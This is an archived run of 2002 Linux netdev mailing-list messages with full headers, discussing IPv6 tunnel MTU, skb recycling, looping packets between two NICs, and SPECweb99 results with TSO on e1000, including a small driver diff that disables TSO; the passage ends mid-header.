From pb@bieringer.de Mon Sep 2 00:06:37 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 02 Sep 2002 00:06:39 -0700 (PDT) Received: from titan.bieringer.de (mail.bieringer.de [195.226.187.51]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8276ZtG022534 for ; Mon, 2 Sep 2002 00:06:36 -0700 Received: (qmail 14055 invoked from network); 2 Sep 2002 07:10:21 -0000 Received: from pd9e4e015.dip.t-dialin.net (217.228.224.21) by mail.bieringer.de with SMTP; 2 Sep 2002 07:10:21 -0000 Date: Mon, 02 Sep 2002 09:10:19 +0200 From: Peter Bieringer To: Maillist netdev Subject: IPv6 MTU of a tunnel: 2 different switches, which wins? Message-ID: <10010000.1030950619@localhost> X-Mailer: Mulberry/2.2.1 (Linux/x86) X-URL: http://www.bieringer.de/pb/ X-OS: Linux MIME-Version: 1.0 Content-type: text/plain Content-Transfer-Encoding: 8bit X-archive-position: 60 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pb@bieringer.de Precedence: bulk X-list: netdev Content-Length: 1182 Lines: 62 Hi, sure here anyone can help me: Let's say I have an internet connection via PPPoE through ppp0/eth1 MTU eth1: 1500 MTU ppp0: 1492 Over this connection, an IPv6 (named tun6to4) tunnel will be established. Now I have 2 different switches to adjust the MTU of the tunnel. a) using utility ip b) using sysctl After unmodified MTU setup: a) # ip link show dev tun6to4 | grep -w mtu 42: tun6to4@NONE: mtu 1480 qdisc noqueue b) # sysctl -a| grep tun6to4 | grep mtu net.ipv6.conf.tun6to4.mtu = 1480 But proper MTU will be MTU tun6to4: 1472 MTU(ppp0) - 20 for IPv4 header where to proper set now? 1) via ip 2) via sysctl in net.ipv6.conf.tun6to4.mtu 3) both switches BTW: host should act either as router or standalone. Thanks for any clarifies, Peter --- Dr. 
Peter Bieringer mailto: pb at bieringer dot de http://www.bieringer.de/pb/ Key 0x958F422D : B501 24F4 9418 23E2 C0F3 F833 7B57 AA7B 958F 422D -- Attached file included as plaintext by Ecartis -- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) iD8DBQE9cw7ce1eqe5WPQi0RAt7BAKDbIkoPEImZ0lhlzSadipAn7AsZlACff1Cs Ap2x3BNiHfIxe6/sD7lqxDU= =8Ya4 -----END PGP SIGNATURE----- From manand@us.ibm.com Mon Sep 2 20:43:36 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 02 Sep 2002 20:43:40 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g833hZtG032073 for ; Mon, 2 Sep 2002 20:43:36 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.194.23]) by e35.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g833lHBA107276; Mon, 2 Sep 2002 23:47:18 -0400 Received: from d03nm123.boulder.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g833lGlA251270; Mon, 2 Sep 2002 21:47:16 -0600 Subject: Re: [Lse-tech] Re: (RFC): SKB Initialization To: jamal Cc: Bill Hartner , davem@redhat.com, linux-kernel@vger.kernel.org, Mala Anand , netdev@oss.sgi.com, Robert Olsson X-Mailer: Lotus Notes Release 5.0.3 (Intl) 21 March 2000 Message-ID: From: "Mala Anand" Date: Mon, 2 Sep 2002 22:47:13 -0500 X-MIMETrack: Serialize by Router on D03NM123/03/M/IBM(Release 5.0.10 |March 22, 2002) at 09/02/2002 09:47:16 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii X-archive-position: 61 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: manand@us.ibm.com Precedence: bulk X-list: netdev Content-Length: 1546 Lines: 47 >On Tue, 27 Aug 2002, Mala Anand wrote: >> SPECweb99 profile shows that __kfree_skb is in the top 5 hot routines. We >> will test the skb recycle patch on SPECweb99 and add skbinit patch >> to that and see how it helps. 
What I understand is that the skb recycle >> patch does not attempt to recycle if the skbs are allocated on CPU >> and freed on another CPU. Is that right? If so, skbinit patch will help >> those cases. >yes it will. Not significant is my current thinking. i.e i wouldn't write >my mother to tell her about it. I have not looked at Robert's recycle skb patch yet. I couldn't find it in the link he sent me so I don't know how it works. However I thought about it a little more and realized that even when you recycle the skbs, they need to be initialized (cleaned up). I don't understand how can the recycle skb patch avoid calling constructors and destructors for the skb. The skbs are given back to the driver instead of freeing to the skb hot list or to the slab. That does not eliminate the part of the code of kfree_skb which releases dst, initializes part of skb and executes destructor. Tell me if I am wrong but wouldn't it break the code. So I do think that recycle skb patch will not mitigate the benefits of the skb init patch. Regards, Mala Mala Anand IBM Linux Technology Center - Kernel Performance E-mail:manand@us.ibm.com http://www-124.ibm.com/developerworks/opensource/linuxperf http://www-124.ibm.com/developerworks/projects/linuxperf Phone:838-8088; Tie-line:678-8088 From rusty@samba.org Mon Sep 2 22:00:45 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 02 Sep 2002 22:01:01 -0700 (PDT) Received: from lists.samba.org (dp.samba.org [66.70.73.150]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8350itG001057 for ; Mon, 2 Sep 2002 22:00:45 -0700 Received: by lists.samba.org (Postfix, from userid 590) id 4052F2C414; Tue, 3 Sep 2002 01:04:41 -0400 (EDT) From: Rusty Russell To: netdev@oss.sgi.com Cc: kuznet@ms2.inr.ac.ru, anton@samba.org Subject: "Loopback" route through two cards? 
Date: Tue, 03 Sep 2002 15:04:47 +1000 Message-Id: <20020903050441.4052F2C414@lists.samba.org> X-archive-position: 62 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rusty@rustcorp.com.au Precedence: bulk X-list: netdev Content-Length: 315 Lines: 10 Hi all, I know this is an FAQ, but I never saw an answer I liked. We want to stress-test a couple of gigabit NICs by connecting them to each other and routing packets out one and into the other. Is this still impossible without nat? Rusty. -- Anyone who quotes me in their sig is an idiot. -- Rusty Russell. From hadi@cyberus.ca Tue Sep 3 04:34:24 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 03 Sep 2002 04:34:28 -0700 (PDT) Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g83BYHtG020925 for ; Tue, 3 Sep 2002 04:34:24 -0700 Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) with ESMTP id HAA11016; Tue, 3 Sep 2002 07:38:02 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g83BUkh07839; Tue, 3 Sep 2002 07:31:14 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Tue, 3 Sep 2002 07:30:46 -0400 (EDT) From: jamal To: Rusty Russell @shell.cyberus.ca@shell.cyberus.ca cc: , , Subject: Re: "Loopback" route through two cards? In-Reply-To: <20020903050441.4052F2C414@lists.samba.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 64 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev Content-Length: 550 Lines: 23 Unless you are trying to stress test NAT, i wouldnt go the NAT path. Have you looked at the packet generator in 2.4.19? With it you can bypass IP totaly. 
cheers, jamal On Tue, 3 Sep 2002, Rusty Russell wrote: > Hi all, > > I know this is an FAQ, but I never saw an answer I liked. We > want to stress-test a couple of gigabit NICs by connecting them to > each other and routing packets out one and into the other. Is this > still impossible without nat? > > Rusty. > -- > Anyone who quotes me in their sig is an idiot. -- Rusty Russell. > From kuznet@ms2.inr.ac.ru Tue Sep 3 05:52:38 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 03 Sep 2002 05:52:41 -0700 (PDT) Received: from sex.inr.ac.ru (sex.inr.ac.ru [193.233.7.165]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g83CqZtG023177 for ; Tue, 3 Sep 2002 05:52:38 -0700 Received: (from kuznet@localhost) by sex.inr.ac.ru (8.6.13/ANK) id QAA02008; Tue, 3 Sep 2002 16:54:44 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200209031254.QAA02008@sex.inr.ac.ru> Subject: Re: "Loopback" route through two cards? To: rusty@rustcorp.com.au (Rusty Russell) Date: Tue, 3 Sep 2002 16:54:44 +0400 (MSD) Cc: netdev@oss.sgi.com, anton@samba.org In-Reply-To: <20020903050441.4052F2C414@lists.samba.org> from "Rusty Russell" at Sep 3, 2 03:04:47 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 X-archive-position: 65 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Content-Length: 655 Lines: 24 Hello! > I know this is an FAQ, but I never saw an answer I liked. And what kind of answers do you like? :-) > still impossible It depends on sense which you put to "impossible". There are two problems with this: 1. You cannot send to local address via any device but loopback. The only way to override this is to use explicit SO_BINDTODEVICE on sending socket. Hence, it is "impossible" not changing application. 2. You cannot receive packets with local address from any device but loopback. 
This is impossible, but this time without editing the kernel, i.e. removing the check for local addresses in fib_validate_source().

Alexey

From Eric.Lemoine@sun.com Wed Sep 4 02:22:45 2002
Received: with ECARTIS (v1.0.0; list netdev); Wed, 04 Sep 2002 02:22:49 -0700 (PDT)
Received: from s1.smtp.oleane.net (s1.smtp.oleane.net [195.25.12.3]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g849MitG022505 for ; Wed, 4 Sep 2002 02:22:44 -0700
Received: from gbl-dhcp-198-223.europe.research.sun.com ([194.2.198.223]) by s1.smtp.oleane.net with ESMTP id g849QjMv011819 for ; Wed, 4 Sep 2002 11:26:45 +0200
Received: from eric by (null) with local (MasqMail 0.1.16) id 17mWQv-0E9-00 for netdev@oss.sgi.com; Wed, 04 Sep 2002 11:26:45 +0200
Date: Wed, 4 Sep 2002 11:26:45 +0200
From: Eric Lemoine
To: netdev@oss.sgi.com
Subject: Re: "Loopback" route through two cards?
Message-ID: <20020904092644.GF329@hookipa>
References: <20020903050441.4052F2C414@lists.samba.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To:
User-Agent: Mutt/1.3.28i
X-Warning: return path set from From: address
X-archive-position: 69
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: Eric.Lemoine@sun.com
Precedence: bulk
X-list: netdev
Content-Length: 278
Lines: 13

> Unless you are trying to stress test NAT, i wouldnt go the NAT path.
> Have you looked at the packet generator in 2.4.19? With it you can
> bypass IP totaly.

pktgen is really cool stuff! I dont see what multiskb could be used for. Does anybody know?

Thx.
Cheers, -- Eric
From tcw@tempest.prismnet.com Thu Sep 5 11:26:17 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 11:26:22 -0700 (PDT) Received: from tempest.prismnet.com (root@tempest.prismnet.com [209.198.128.6]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g85IQGtG028356 for ; Thu, 5 Sep 2002 11:26:17 -0700 Received: from tempest.prismnet.com (tcw@localhost [127.0.0.1]) by tempest.prismnet.com (8.12.5/8.12.5) with ESMTP id g85IUNwf096255; Thu, 5 Sep 2002 13:30:24 -0500 (CDT) (envelope-from tcw@tempest.prismnet.com) Received: (from tcw@localhost) by tempest.prismnet.com (8.12.5/8.12.5/Submit) id g85IUMdH096254; Thu, 5 Sep 2002 13:30:22 -0500 (CDT) From: Troy Wilson Message-Id: <200209051830.g85IUMdH096254@tempest.prismnet.com> Subject: Early SPECWeb99 results on 2.5.33 with TSO on e1000 To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Date: Thu, 5 Sep 2002 13:30:22 -0500 (CDT) X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII X-archive-position: 73 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tcw@tempest.prismnet.com Precedence: bulk X-list: netdev I've got some early SPECWeb [*] results with 2.5.33 and TSO on e1000. I get 2906 simultaneous connections, 99.2% conforming (i.e. faster than the 320 kbps cutoff), at 0% idle with TSO on. For comparison, with 2.5.25, I got 2656, and with 2.5.29 I got 2662, (both 99+% conformance and 0% idle) so TSO and 2.5.33 look like a Big Win. I'm having trouble testing with TSO off (I changed the #define NETIF_F_TSO to "0" in include/linux/netdevice.h to turn it off). I am getting errors. 
NETDEV WATCHDOG: eth1: transmit timed out
e1000: eth1 NIC Link is Up 1000 Mbps Full Duplex

That's pushed my SPECWeb results down to below 2500 connections with TSO off because of those adapter resets (It is only that one adapter, BTW) and these results (with TSO off) shouldn't be considered valid.

eth1 is the only adapter with errors, and they all look like RX overruns. For comparison:

eth1      Link encap:Ethernet  HWaddr 00:02:B3:9C:F5:9E
          inet addr:192.168.4.1  Bcast:192.168.4.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:48621378 errors:8890 dropped:8890 overruns:8890 frame:0
          TX packets:64342993 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:3637004554 (3468.5 Mb)  TX bytes:1377740556 (1313.9 Mb)
          Interrupt:61 Base address:0x1200 Memory:fc020000-0

eth3      Link encap:Ethernet  HWaddr 00:02:B3:A3:47:E7
          inet addr:192.168.3.1  Bcast:192.168.3.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:37130540 errors:0 dropped:0 overruns:0 frame:0
          TX packets:49061277 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:2774988658 (2646.4 Mb)  TX bytes:3290541711 (3138.1 Mb)
          Interrupt:44 Base address:0x2040 Memory:fe120000-0

I'm still working on getting a clean run with TSO off. If anyone has any ideas for me about the timeout errors, I'd appreciate the clue.

Thanks,

- Troy

* SPEC(tm) and the benchmark name SPECweb(tm) are registered trademarks of the Standard Performance Evaluation Corporation. This benchmarking was performed for research purposes only, and is non-compliant, with the following deviations from the rules -

1 - It was run on hardware that does not meet the SPEC availability-to-the-public criteria. The machine is an engineering sample.

2 - access_log wasn't kept for full accounting. It was being written, but deleted every 200 seconds.
From scott.feldman@intel.com Thu Sep 5 13:43:39 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 13:43:45 -0700 (PDT) Received: from mail2.hd.intel.com (hdfdns02.hd.intel.com [192.52.58.11]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g85KhctG032665 for ; Thu, 5 Sep 2002 13:43:39 -0700 Received: from fmsmsxvs041.fm.intel.com (fmsmsxvs041.fm.intel.com [132.233.42.126]) by mail2.hd.intel.com (8.11.6/8.11.6/d: solo.mc,v 1.43 2002/08/30 20:06:11 dmccart Exp $) with SMTP id g85Klfl22182 for ; Thu, 5 Sep 2002 20:47:41 GMT Received: from FMSMSX017.fm.intel.com ([132.233.42.196]) by fmsmsxvs041.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2002090513464618419 ; Thu, 05 Sep 2002 13:46:46 -0700 Received: by fmsmsx017.fm.intel.com with Internet Mail Service (5.5.2653.19) id ; Thu, 5 Sep 2002 13:47:39 -0700 Message-ID: <288F9BF66CD9D5118DF400508B68C4460283E5BC@orsmsx113.jf.intel.com> From: "Feldman, Scott" To: "'Troy Wilson'" Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: RE: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Date: Thu, 5 Sep 2002 13:47:36 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain X-archive-position: 74 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev Troy Wilson wrote: > I've got some early SPECWeb [*] results with 2.5.33 and TSO > on e1000. I get 2906 simultaneous connections, 99.2% > conforming (i.e. faster than the 320 kbps cutoff), at 0% idle > with TSO on. For comparison, with 2.5.25, I > got 2656, and with 2.5.29 I got 2662, (both 99+% conformance > and 0% idle) so TSO and 2.5.33 look like a Big Win. A 10% bump is good. Thanks for running the numbers. > I'm having trouble testing with TSO off (I changed the > #define NETIF_F_TSO to "0" in include/linux/netdevice.h to > turn it off). I am getting errors. 
Sorry, I should have made a CONFIG switch. Just hack the driver for now to turn it off:

--- linux-2.5/drivers/net/e1000/e1000_main.c	Fri Aug 30 19:26:57 2002
+++ linux-2.5-no_tso/drivers/net/e1000/e1000_main.c	Thu Sep 5 13:38:44 2002
@@ -428,9 +428,11 @@ e1000_probe(struct pci_dev *pdev,
 	}
 
 #ifdef NETIF_F_TSO
+#if 0
 	if(adapter->hw.mac_type >= e1000_82544)
 		netdev->features |= NETIF_F_TSO;
 #endif
+#endif
 
 	if(pci_using_dac)
 		netdev->features |= NETIF_F_HIGHDMA;

-scott

From hadi@cyberus.ca Thu Sep 5 14:02:32 2002
Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 14:02:35 -0700 (PDT)
Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g85L2VtG000726 for ; Thu, 5 Sep 2002 14:02:31 -0700
Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) with ESMTP id RAA20202; Thu, 5 Sep 2002 17:06:39 -0400 (EDT)
Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g85KxmJ20649; Thu, 5 Sep 2002 16:59:48 -0400 (EDT)
X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs
Date: Thu, 5 Sep 2002 16:59:47 -0400 (EDT)
From: jamal
To: Troy Wilson
cc: ,
Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000
In-Reply-To: <200209051830.g85IUMdH096254@tempest.prismnet.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 75
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: hadi@cyberus.ca
Precedence: bulk
X-list: netdev

Hey, thanks for crossposting to netdev

So if i understood correctly (looking at the intel site) the main value add of this feature is probably in having the CPU avoid reassembling and retransmitting.
I am willing to bet that the real value in your results is in saving on retransmits; I would think shoving the data down the NIC and avoid the fragmentation shouldnt give you that much significant CPU savings. Do you have any stats from the hardware that could show retransmits etc; have you tested this with zero copy as well (sendfile) again, if i am right you shouldnt see much benefit from that either? I would think it probably works well with things like partial ACKs too? (I am almost sure it does or someone needs to be spanked, so just checking). cheers, jamal From tcw@tempest.prismnet.com Thu Sep 5 15:07:10 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 15:07:15 -0700 (PDT) Received: from tempest.prismnet.com (root@tempest.prismnet.com [209.198.128.6]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g85M7AtG002019 for ; Thu, 5 Sep 2002 15:07:10 -0700 Received: from tempest.prismnet.com (tcw@localhost [127.0.0.1]) by tempest.prismnet.com (8.12.5/8.12.5) with ESMTP id g85MBGwf099388; Thu, 5 Sep 2002 17:11:17 -0500 (CDT) (envelope-from tcw@tempest.prismnet.com) Received: (from tcw@localhost) by tempest.prismnet.com (8.12.5/8.12.5/Submit) id g85MBFdm099387; Thu, 5 Sep 2002 17:11:15 -0500 (CDT) From: Troy Wilson Message-Id: <200209052211.g85MBFdm099387@tempest.prismnet.com> Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: "from jamal at Sep 5, 2002 04:59:47 pm" To: jamal Date: Thu, 5 Sep 2002 17:11:15 -0500 (CDT) CC: linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII X-archive-position: 76 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tcw@tempest.prismnet.com Precedence: bulk X-list: netdev > So if i understood correctly (looking at the intel site) the main value > add of this feature is probably in having the CPU 
avoid reassembling and > retransmitting. Quoting David S. Miller: dsm> The performance improvement comes from the fact that the card dsm> is given huge 64K packets, then the card (using the given ip/tcp dsm> headers as a template) spits out 1500 byte mtu sized packets. dsm> dsm> Less data DMA'd to the device per normal-mtu packet and less dsm> per-packet data structure work by the cpu is where the improvement dsm> comes from. > Do you have any stats from the hardware that could show > retransmits etc; I'll gather netstat -s after runs with and without TSO enabled. Anything else you'd like to see? > have you tested this with zero copy as well (sendfile) Yes. My webserver is Apache 2.0.36, which uses sendfile for anything over 8k in size. But, iirc, Apache sends the http headers using writev. Thanks, - Troy From niv@us.ibm.com Thu Sep 5 15:35:55 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 15:36:00 -0700 (PDT) Received: from e2.ny.us.ibm.com (e2.ny.us.ibm.com [32.97.182.102]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g85MZstG002622 for ; Thu, 5 Sep 2002 15:35:55 -0700 Received: from northrelay03.pok.ibm.com (northrelay03.pok.ibm.com [9.56.224.151]) by e2.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g85MdvIV127250; Thu, 5 Sep 2002 18:39:57 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by northrelay03.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g85Mds4V035804; Thu, 5 Sep 2002 18:39:55 -0400 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id 229D43FE06; Thu, 5 Sep 2002 18:39:30 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id 3E76F23C00F; Thu, 5 Sep 2002 18:39:32 -0400 (EDT) Received: from 9.65.20.67 ( [9.65.20.67]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Thu, 5 Sep 2002 15:39:31 -0700 Message-ID: <1031265571.3d77dd23caec4@imap.linux.ibm.com> Date: Thu, 5 Sep 2002 15:39:31 -0700 From: Nivedita 
Singhvi To: Troy Wilson Cc: jamal , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <200209052211.g85MBFdm099387@tempest.prismnet.com> In-Reply-To: <200209052211.g85MBFdm099387@tempest.prismnet.com> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.65.20.67 X-archive-position: 77 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Quoting Troy Wilson : > > Do you have any stats from the hardware that could show > > retransmits etc; > > I'll gather netstat -s after runs with and without TSO enabled. > Anything else you'd like to see? Troy, this is pointing out the obvious, but make sure you have the before stats as well :)... > > have you tested this with zero copy as well (sendfile) > > Yes. My webserver is Apache 2.0.36, which uses sendfile for > anything > over 8k in size. But, iirc, Apache sends the http headers using > writev. SpecWeb99 doesnt execute the path that might benefit the most from this patch - sendmsg() of large files - large writes going down.. 
thanks, Nivedita From niv@us.ibm.com Thu Sep 5 15:44:35 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 15:44:37 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g85MiYtG003464 for ; Thu, 5 Sep 2002 15:44:35 -0700 Received: from northrelay03.pok.ibm.com (northrelay03.pok.ibm.com [9.56.224.151]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g85MmbEG148808; Thu, 5 Sep 2002 18:48:37 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by northrelay03.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g85MmY4V087024; Thu, 5 Sep 2002 18:48:34 -0400 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id D26F73FE06; Thu, 5 Sep 2002 18:48:35 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id 7BB2223C00D; Thu, 5 Sep 2002 18:48:35 -0400 (EDT) Received: from 9.65.20.67 ( [9.65.20.67]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Thu, 5 Sep 2002 15:48:35 -0700 Message-ID: <1031266115.3d77df4344463@imap.linux.ibm.com> Date: Thu, 5 Sep 2002 15:48:35 -0700 From: Nivedita Singhvi To: jamal Cc: Troy Wilson , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.65.20.67 X-archive-position: 78 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Quoting jamal : > So if i understood correctly (looking at the intel site) the main > value add of this feature is probably in having the CPU avoid > reassembling and retransmitting. I am willing to bet that the real Er, even just assembling and transmitting? 
I'm thinking of the reduction in things like separate memory allocation calls and looking up the route, etc..?? > value in your results is in saving on retransmits; I would think > shoving the data down the NIC and avoid the fragmentation shouldnt > give you that much significant CPU savings. Do you have any stats Why do say that? Wouldnt the fact that youre now reducing the number of calls down the stack by a significant number provide a significant saving? > from the hardware that could show retransmits etc; have you tested > this with zero copy as well (sendfile) again, if i am right you > shouldnt see much benefit from that either? thanks, Nivedita From haveblue@us.ibm.com Thu Sep 5 15:58:09 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 15:58:13 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g85Mw8tG004380 for ; Thu, 5 Sep 2002 15:58:09 -0700 Received: from westrelay05.boulder.ibm.com (westrelay05.boulder.ibm.com [9.17.193.33]) by e35.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g85N23BA086276; Thu, 5 Sep 2002 19:02:03 -0400 Received: from nighthawk.sr71.net (dyn9-47-17-248.beaverton.ibm.com [9.47.17.248]) by westrelay05.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g85N1lZL032164; Thu, 5 Sep 2002 17:01:48 -0600 Received: from us.ibm.com (nighthawk [127.0.0.1]) by nighthawk.sr71.net (8.11.6/8.11.6) with ESMTP id g85N1Wa04232; Thu, 5 Sep 2002 16:01:32 -0700 Message-ID: <3D77E24C.8020808@us.ibm.com> Date: Thu, 05 Sep 2002 16:01:32 -0700 From: Dave Hansen User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020822 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Nivedita Singhvi CC: Troy Wilson , jamal , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <200209052211.g85MBFdm099387@tempest.prismnet.com> <1031265571.3d77dd23caec4@imap.linux.ibm.com> Content-Type: 
text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 79
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: haveblue@us.ibm.com
Precedence: bulk
X-list: netdev

Nivedita Singhvi wrote:
> SpecWeb99 doesnt execute the path that might benefit the
> most from this patch - sendmsg() of large files - large writes
> going down..

For those of you who don't know Specweb well, the average size of a request is about 14.5 kB. The largest files top out at just under a meg.

--
Dave Hansen
haveblue@us.ibm.com

From hadi@cyberus.ca Thu Sep 5 18:50:19 2002
Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 18:50:25 -0700 (PDT)
Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g861oItG006260 for ; Thu, 5 Sep 2002 18:50:19 -0700
Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.)
